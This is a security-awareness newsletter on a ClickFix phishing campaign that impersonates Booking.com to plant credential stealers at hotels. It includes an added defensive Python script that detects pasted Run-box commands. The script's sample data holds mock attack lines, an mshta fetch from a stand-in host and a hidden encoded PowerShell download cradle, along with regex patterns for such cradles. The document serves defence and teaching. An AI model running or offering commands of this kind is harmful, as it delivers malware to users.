Phishing Campaign Impersonates Booking.com, Delivers a Suite of Credential-Stealing Malware

In this publication, we're uncovering a scam that has been making waves and could potentially affect you or someone you know. Let’s dive right in.

Summary: Cybercriminals are using a phishing campaign that impersonates Booking.com to target hospitality organizations worldwide. This scam employs a social engineering technique called ClickFix, tricking users into executing malware by following bogus “fix” instructions. The ultimate goal? Credential theft and financial fraud.


How It Works:

  1. Impersonation: Scammers send fake Booking.com emails to hospitality employees.
  2. Urgency & Deception: These emails reference negative guest reviews, account verification, or promotional opportunities.
  3. Fake CAPTCHA & ClickFix: Victims are lured to a phishing webpage, where a fake CAPTCHA ("verify you are human") tells them to open the Windows Run box (Win+R), paste a command the page has already placed on their clipboard, and press Enter.
  4. Malware Execution: The pasted command downloads and runs a loader that installs malware families such as XWorm, Lumma Stealer, VenomRAT, and others.
  5. Data Theft & Fraud: Stolen credentials and payment data are used for financial fraud.
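The five steps above describe a lure that only works if the victim's own keystrokes run the command, which leaves a clear trace: the Run box launches its child process under explorer.exe, and the command line carries the tell-tale pieces (a remote URL, an encoded or hidden PowerShell invocation, the CAPTCHA wording the page appends to the command). The script below is an added example written for this summary, not code from the source article or from Microsoft; it triages constructed process-creation records and Run-history values for that pattern. The event shape (parent image, child image, command line), the sample records, the domain example.invalid and the indicator list are all assumptions of the example.

```python
"""Triage Windows process-creation records and RunMRU values for the ClickFix
pattern: explorer.exe (the Run box) spawning an interpreter with a suspicious
command line. Added example; all sample data below is constructed."""
import base64
import re

# Interpreters and download helpers a pasted ClickFix command typically invokes.
# This list is an assumption of the example, not taken from the article.
INTERPRETERS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "msiexec.exe",
}

# (label, regex) pairs; every match adds one reason to a finding.
INDICATORS = [
    ("remote URL in command line", re.compile(r"https?://", re.I)),
    ("encoded PowerShell", re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden window", re.compile(r"-(w|windowstyle)\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-(ep|executionpolicy)\s+bypass", re.I)),
    ("download-and-run cradle",
     re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I)),
    ("CAPTCHA lure text in command", re.compile(r"(not a robot|recaptcha|verification id)", re.I)),
]

ENC_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); '' if absent or invalid."""
    m = ENC_RX.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def command_reasons(cmdline):
    """Indicator labels matched by the command line and, if present, its decoded payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return [label for label, rx in INDICATORS if rx.search(text)]


def triage(events):
    """Return (index, child image, reasons) for each record matching the ClickFix pattern."""
    findings = []
    for i, (parent, image, cmdline) in enumerate(events):
        # Win+R runs its child under explorer.exe; a terminal or script host as the
        # parent is the usual shape of legitimate administrative use.
        if basename(parent) != "explorer.exe" or basename(image) not in INTERPRETERS:
            continue
        reasons = command_reasons(cmdline)
        if reasons:  # parent+child alone is not enough; require an indicator too
            findings.append((i, basename(image), reasons))
    return findings


def triage_runmru(values):
    """Screen values exported from HKCU\\...\\Explorer\\RunMRU (each entry ends in '\\1')."""
    hits = []
    for name, data in values.items():
        if name == "MRUList":  # ordering value, not a command
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        reasons = command_reasons(cmd)
        if reasons:
            hits.append((name, cmd, reasons))
    return hits


# Constructed sample records: (parent image, child image, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\calc.exe", "calc"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     'mshta https://example.invalid/verify # "I am not a robot - reCAPTCHA Verification ID: 7811"'),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("C:\\Program Files\\WindowsApps\\WindowsTerminal.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell -File .\\backup.ps1"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell"),
]

# Constructed RunMRU export: the Run box keeps a history of what was typed or pasted.
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "calc\\1",
    "b": 'mshta https://example.invalid/verify # "I am not a robot - reCAPTCHA Verification ID: 7811"\\1',
}

if __name__ == "__main__":
    for index, image, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {image} flagged for {', '.join(reasons)}")
    for name, cmd, reasons in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {name}: {cmd!r} flagged for {', '.join(reasons)}")
```

Two design choices matter here. The parent/child pairing alone is deliberately not a finding, because users do open PowerShell or cmd from the Run box legitimately; only the combination with a remote URL, an encoded or hidden invocation, or the CAPTCHA wording produces an alert. And because `-EncodedCommand` hides the download cradle from plain string matching, the payload is decoded and screened as well. On a real host the same `command_reasons` check can be pointed at Sysmon Event ID 1 or Security 4688 records and at the RunMRU key, which survives even after the phishing page is gone.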


Who’s Targeted:

  • Hospitality industry professionals.
  • Organizations in North America, Oceania, South/Southeast Asia, and Europe.
  • Employees likely to interact with Booking.com.


Real-Life Example: 

In early 2025, a European hotel employee received an email claiming their Booking.com account required urgent verification. Trusting the email, they followed the steps, unknowingly executing a command that compromised their system. Within hours, guest payment details were stolen, leading to fraudulent transactions.


Why You Should Care:

  • Financial Risk: Stolen credentials lead to unauthorized charges and financial losses.
  • Reputation Damage: Hospitality businesses risk customer trust when data is breached.
  • Widespread Impact: ClickFix is a reusable technique rather than a one-off lure, and the same copy-and-paste trick is turning up in campaigns against other industries.


How to Protect Yourself:

  1. Verify Emails: Always check the sender’s address and hover over links before clicking, and confirm any account notice by logging in to Booking.com directly rather than through the emailed link.
  2. Avoid Copy-Pasting Commands: No legitimate website or CAPTCHA will ever ask you to open the Windows Run box and paste a command; that request is the attack itself. Administrators can also block the Run dialog for users who have no need for it with the Group Policy setting "Remove Run menu from Start Menu".
  3. Enable Multi-Factor Authentication (MFA): Secure accounts against unauthorized access. Note that infostealers such as Lumma also take browser session cookies, so MFA limits the damage but does not protect an account once malware is running on the machine.
  4. Use Secure Browsers: Microsoft Edge and other browsers with built-in phishing protection (Microsoft Defender SmartScreen, Google Safe Browsing) help block known malicious sites.
  5. Educate Your Team: Train employees to recognize phishing tactics, including the specific ClickFix pattern of a web page asking them to paste a command.


Quick Tips & Updates:

  • Pro Tip: If an email pressures you to act immediately, take a step back—it’s likely a scam.
  • Did You Know? Attackers often use typosquatting—domains like b00king[.]com instead of booking.com.


Stay safe, stay informed.


Keyword Definitions:

  • Phishing: A cyber-attack where scammers trick individuals into revealing sensitive information, often through fake emails or websites.
  • ClickFix: A social engineering technique where attackers trick users into executing malicious commands under the guise of “fixing” an issue.
  • Malware: Malicious software designed to damage, disrupt, or steal data from devices.
  • RAT (Remote Access Trojan): A type of malware that gives hackers remote control over a victim’s computer.
  • Credential Stealer: A type of malware that captures login information, allowing attackers to access accounts.
  • Multi-Factor Authentication (MFA): A security process requiring multiple forms of verification before granting access to an account.
  • CAPTCHA: A security feature designed to distinguish between human users and automated bots, often used to protect websites.

To read more, see the source article.
